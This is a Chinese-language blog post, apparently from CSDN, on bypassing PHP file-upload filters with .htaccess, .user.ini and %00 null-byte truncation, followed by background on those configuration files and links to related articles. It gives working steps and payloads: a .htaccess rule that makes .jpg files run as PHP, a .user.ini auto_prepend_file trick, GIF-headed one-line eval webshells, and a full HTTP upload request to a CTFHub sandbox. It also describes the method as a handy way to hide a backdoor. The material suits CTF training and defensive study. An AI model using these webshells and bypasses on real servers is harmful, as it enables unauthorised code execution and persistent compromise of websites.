1、.htaccess

1使用方法，上传.htaccess文件内容如下

<FilesMatch "shell">
SetHandler application/x-httpd-php
</FilesMatch>

匹配文件名为“shell”的文件，该文件作为可执行程序解析

或者

AddType application/x-httpd-php .jpg


jpg文件作为可执行程序执行

2再上传shell.jpg

GIF89a
<script language='php'> @eval($_POST['a']);</script>

3访问shell.jpg文件

2、.user.ini

方式使用限制，在上传的目录中必须包含php文件，例如index.php

1上传.user.ini文件，内容为：

GIF89a
auto_prepend_file=1.gif

加载1.gif文件

2上传1.gif文件

GIF89a
<script language='php'> @eval($_POST['a']);</script>

3 访问同目录中的php文件，例如index.php ，先通过本目录中的配置文件.user.ini进行加载1.gif文件从而达到加载后门的目的

3、00截断

00截断有限制，php版本得低于5.3，并且GPC得关闭，一般在url上。两种，%00和0x00,后台读取是遇到%00就会停止。举个例子，url中输入的是upload/post.php%00.jpg，那么后台读取到是upload/post.php，就实现了绕后目的。

POST /?road=/var/www/html/upload/1.php%00 HTTP/1.1
Host: challenge-57c0e3e249fc35a4.sandbox.ctfhub.com:10080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------47182109526658916741339492122
Content-Length: 369
Origin: http://challenge-57c0e3e249fc35a4.sandbox.ctfhub.com:10080
Connection: close
Referer: http://challenge-57c0e3e249fc35a4.sandbox.ctfhub.com:10080/
Upgrade-Insecure-Requests: 1

-----------------------------47182109526658916741339492122
Content-Disposition: form-data; name="file"; filename="shell.php.jpg"
Content-Type: image/jpeg

<?php @eval($_GET['hack']) ?>
-----------------------------47182109526658916741339492122
Content-Disposition: form-data; name="submit"

Submit
-----------------------------47182109526658916741339492122--

4、.htaccess

.htaccess是什么

.htaccess文件(或者”分布式配置文件”）提供了针对目录改变配置的方法，即，在一个特定的文档目录中放置一个包含一个或多个指令的文件，以作用于此目录及其所有子目录。作为用户，所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。

概述来说，htaccess文件是Apache服务器中的一个配置文件，它负责相关目录下的网页配置。通过htaccess文件，可以帮我们实现：网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。启用.htaccess，需要修改httpd.conf，启用AllowOverride，并可以用AllowOverride限制特定命令的使用。如果需要使用.htaccess以外的其他文件名，可以用AccessFileName指令来改变。例如，需要使用.config ，则可以在服务器配置文件中按以下方法配置：AccessFileName .config 。笼统地说，.htaccess可以帮我们实现包括：文件夹密码保护、用户自动重定向、自定义错误页面、改变你的文件扩展名、封禁特定IP地址的用户、只允许特定IP地址的用户、禁止目录列表，以及使用其他文件作为index文件等一些功能。 .htaccess文件可以在网站目录树的任何一个目录中，只对该文件所在目录中的文件和子目录有效。

注意：

1、子目录中的指令会笼盖更高级目录或者主器配置中的指令。如果 .htaccess 文件保存在 /apache/home/www/Gunjit/ 目录，那么它会向该目录中的所有文件和子目录提供命令，但如果该目录包含一个名为 /Gunjit/images/ 子目录，且该子目录中也有一个 .htaccess 文件，那么这个子目录中的命令会覆盖父目录中 .htaccess 文件(或者目录层次结构中更上层的文件)提供的命令。

.htaccess文件中的配置指令作用于.htaccess文件所在的目录及其所有子目录，但是很重要的、需要注意的是，其上级目录也可能会有.htaccess文件，而指令是按查找顺序依次生效的，所以一个特定目录下的.htaccess文件中的指令可能会覆盖其上级目录中的.htaccess文件中的指令，即子目录中的指令会覆盖父目录或者主配置文件中的指令。

2、.htaccess必需以ASCII模式上传，最好将其权限设置为644。 3、使用.htaccess文件，会降低httpd服务器的一点性能

为什么要使用.htaccess

很多网站都是租用服务器和虚拟主机的，其服务器的配置我们并不能改。当我们有特殊要求时，比如定义最简单的404（页面未找到）的错误页面，我们就只能通过apache配置的扩展配置（或者说是子配置）来更改扩展原服务器的配置。这个配置就是.htaccess文件，他是apache下的http.conf文件的延续。

如何启用.htaccess

要在服务器上使用.htaccess文件配置，必须要求服务器开通对于的支持。两个条件：1.mod_rewrite模块开启；2. AllowOverride All, 如何配置：

启用AllowOverride。打开httpd.conf, 将工作目录下的AllowOverride None 改为AllowOverride All。

<VirtualHost *:80>ServerName www.nhs.comServerAlias nhs.comDocumentRoot D:/projects/htdocs/nhs/nfs_cms<Directory  "D:/projects/htdocs/nhs/nfs_cms/">Options +Indexes +Includes +FollowSymLinks +MultiViewsAllowOverride AllRequire local</Directory>
</VirtualHost>

2.. 开启.mod_rewrite模块。将#LoadModule rewrite_module modules/mod_rewrite.so前的#去掉即可。

重启apache

一般情况下，不应该使用.htaccess文件

一般情况下，不应该使用.htaccess文件，除非你对主配置文件没有访问权限。建议把用户认证写在主配置文件中，而且是一种很好的方法。

.htaccess文件应该被用在内容提供者需要针对特定目录改变服务器的配置而又没有root权限的情况下。如果服务器管理员不愿意频繁修改配置，则可以允许用户通过.htaccess文件自己修改配置，尤其是ISP在同一个机器上运行了多个用户站点，而又希望用户可以自己改变配置的情况下。

虽然如此，一般都应该尽可能地避免使用.htaccess文件。任何希望放在.htaccess文件中的配置，都可以放在主配置文件的段中，而且更高效。

避免使用.htaccess文件有两个主要原因

1、首先是性能。如果AllowOverride启用了.htaccess文件，则Apache需要在每个目录中查找.htaccess文件，因此，无论是否真正用到，启用.htaccess都会导致性能的下降。另外，对每一个请求，都需要读取一次.htaccess文件。还有，Apache必须在所有上级的目录中查找.htaccess文件，以使所有有效的指令都起作用，所以，如果请求/ctusky/ctu/sky中的页面，Apache必须查找以下文件：

/.htaccess
/ctusky/.htaccess
/ctusky/ctu/.htaccess
/ctusky/ctu/sky/.htaccess　　一共就要访问4个额外的文件，就算这些文件都不存在，这也是本文开始说会影响服务器的一点性能的原因

2、其次是安全。这样会允许用户自己修改服务器的配置，这可能会导致某些意想不到的修改，所以请认真考虑是否应当给予用户这样的特权。

注意，在/www/htdocs/example目录下的.htaccess文件中放置指令，与在主配置文件中<Directory /www/htdocs/example>段中放置相同指令，是完全等效的。

/www/htdocs/example目录下的.htaccess文件的内容：
AddType text/example .exm
httpd.conf文件中摘录的内容： 　　
<Directory /www/htdocs/example> 　　
AddType text/example .exm 　　
</Directory>但是，把配置放在主配置文件中更加高效，因为只需要在Apache启动时读取一次，而不是在每次文件被请求时都读取。 将AllowOverride设置为none可以完全禁止使用.htaccess文件： 　　
AllowOverride None

参考文献：

Apache服务器中的.htaccess文件的配置_www.test.cn_kakuma_chen的博客-CSDN博客

5、.user.ini

那么什么是.user.ini？

这得从php.ini说起了。php.ini是php默认的配置文件，其中包括了很多php的配置，这些配置中，又分为几种：PHP_INI_SYSTEM、PHP_INI_PERDIR、PHP_INI_ALL、PHP_INI_USER。在此可以查看：PHP: php.ini 配置选项列表 - Manual 这几种模式有什么区别？看看官方的解释：

其中就提到了，模式为PHP_INI_USER的配置项，可以在ini_set()函数中设置、注册表中设置，再就是.user.ini中设置。这里就提到了.user.ini，那么这是个什么配置文件？那么官方文档在这里又解释了：

除了主 php.ini 之外，PHP 还会在每个目录下扫描 INI 文件，从被执行的 PHP 文件所在目录开始一直上升到 web 根目录（$_SERVER['DOCUMENT_ROOT'] 所指定的）。如果被执行的 PHP 文件在 web 根目录之外，则只扫描该目录。

在 .user.ini 风格的 INI 文件中只有具有 PHP_INI_PERDIR 和 PHP_INI_USER 模式的 INI 设置可被识别。

这里就很清楚了，.user.ini实际上就是一个可以由用户“自定义”的php.ini，我们能够自定义的设置是模式为“PHP_INI_PERDIR 、 PHP_INI_USER”的设置。（上面表格中没有提到的PHP_INI_PERDIR也可以在.user.ini中设置）

实际上，除了PHP_INI_SYSTEM以外的模式（包括PHP_INI_ALL）都是可以通过.user.ini来设置的。

而且，和php.ini不同的是，.user.ini是一个能被动态加载的ini文件。也就是说我修改了.user.ini后，不需要重启服务器中间件，只需要等待user_ini.cache_ttl所设置的时间（默认为300秒），即可被重新加载。

然后我们看到php.ini中的配置项，可惜我沮丧地发现，只要稍微敏感的配置项，都是PHP_INI_SYSTEM模式的（甚至是php.ini only的），包括disable_functions、extension_dir、enable_dl等。不过，我们可以很容易地借助.user.ini文件来构造一个“后门”。

Php配置项中有两个比较有意思的项（下图第一、四个）：

auto_append_file、auto_prepend_file，点开看看什么意思：

指定一个文件，自动包含在要执行的文件前，类似于在文件前调用了require()函数。而auto_append_file类似，只是在文件后面包含。使用方法很简单，直接写在.user.ini中：

auto_prepend_file=01.gif

01.gif是要包含的文件。

所以，我们可以借助.user.ini轻松让所有php文件都“自动”包含某个文件，而这个文件可以是一个正常php文件，也可以是一个包含一句话的webshell。

测试一下，我分别在IIS6.0+Fastcgi+PHP5.3和nginx+fpm+php5.3上测试。目录下有.user.ini，和包含webshell的01.gif，和正常php文件echo.php：

访问echo.php即可看到后门：

Nginx下同样：

那么，我们可以猥琐地想一下，在哪些情况下可以用到这个姿势？比如，某网站限制不允许上传.php文件，你便可以上传一个.user.ini，再上传一个图片马，包含起来进行getshell。不过前提是含有.user.ini的文件夹下需要有正常的php文件，否则也不能包含了。再比如，你只是想隐藏个后门，这个方式是最方便的。

参考文献

.user.ini文件构成的PHP后门 - phith0n

文件上传 .htaccess 与.user.ini相关推荐

WEB攻防-通用漏洞文件上传二次渲染.htaccess变异免杀
目录知识点详细点文件二次渲染 php删除规则例题 CTF-Web入门-162 CTF-Web入门-163 CTF-Web入门-164 CTF-Web入门-165 CTF-Web入门-166 C ...
河南省网络安全高校战队联盟CTF训练营-web文件上传第一期
文件上传个人介绍姓名:飞羽 CTF菜菜一枚例题来源 ctfhub:https://www.ctfhub.com pwnthebox:https://insider.pwnthebox.com c ...
php实现附件上传下载,PHP实现文件上传与下载
文件上传原理: 将客户端的文件上传到服务器端,再将服务器端的临时文件移动到指定目录即可. 客户端配置: 1.表单页面 2.表单的发送方式为post 3.添加enctype="multipar ...
（21）【后端黑白名单绕过】【WEB 漏洞利用/原理】不懂原理都是没灵魂的方法躯壳？文件上传漏洞利用过程
目录后端黑名单绕过特殊可解析后缀原理:就是加上数字等,但是可以被当做原来的类型进行执行利用过程: .htaccess解析原理:上传.htaccess文件到指定的目录,重写当前目录下的解析规则 ...
第三十二天学习笔记-web漏洞-文件上传的条件竞争、.htaccess文件与.user.ini文件使用前提、二次渲染
目录二次渲染原理绕过方法 htaccess配置文件 .user.ini 二次渲染原理在我们上传文件后,网站会对图片进行二次处理(格式.尺寸,保存,删除要求等),服务器会把里面的内容进行替换更新 ...
2021-08-08ctf中的上传upload题目.user.ini绕过后缀黑名单过滤（同文件夹下有php文件突破口）
从SUCTF 2019 CheckIn 浅谈.user.ini的利用 / 2019-08-28 08:59:00 / 转自loong大佬-来自先知社区 <span class="con ...
php大文件上传php.ini配置
来源:http://xuqin.blog.51cto.com/5183168/909258 http://wenku.baidu.com/view/daa108687e21af45b307a8e3.h ...
php.ini maxfileuploads,细说PHP高洛峰文件上传类源文件
以下是兄弟连php视频教程中高洛峰老师所教授的文件上传类的源代码,尚没有完全理解精髓,在这里记录一下,供日后有需要时查看: $value){ $key=strtolower($key); if(!in ...
文件上传/JS/MIME/黑名单/白名单/htaccess/00截断详解篇[代码审计]
文件上传漏洞定义文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力,这种攻击方式是最为直接和有效的,"文件上传"本身没有问题,有问题的是 ...

文件上传 .htaccess 与.user.ini